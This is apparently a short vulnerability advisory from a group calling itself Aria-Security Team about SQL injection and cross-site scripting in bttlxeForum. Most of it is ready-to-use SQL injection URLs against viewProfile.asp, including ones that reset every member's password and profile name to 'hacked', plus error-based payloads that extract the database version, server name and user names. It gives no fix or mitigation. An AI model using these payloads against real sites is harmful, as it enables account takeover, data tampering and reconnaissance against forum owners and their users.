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bttlxeForum Multiple SQL Injection And Cross Site Scripting
bttlxeForum Multiple SQL Injection And Cross Site Scripting
bttlxeForum Multiple SQL Injection And Cross Site Scripting

Aria-Security Team
Discovered By: Mormoroth
Shout outs The-0utlaw for completing the vuln.

I.SQL Injection

http://site.ltd/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';--
This Changes MemberList...

http://site.ltd/myaccount/viewProfile.asp?member='update Members set Password='hacked';--
changes all the users' password to hacked

has the same problem

a' or 1=convert(int,@@version)--
a' or 1=convert(int,@@servername)--
a' or 1=convert(int,db_name())--
a' or 1=convert(int,user_name())--
a' or 1=convert(int,system_user)

Might be useful.

II.Cross Site SCripting:

Adivsory @ http://aria-security.net/forum/forumdisplay.php?f=60
Credits Goes To Aria-Security Team

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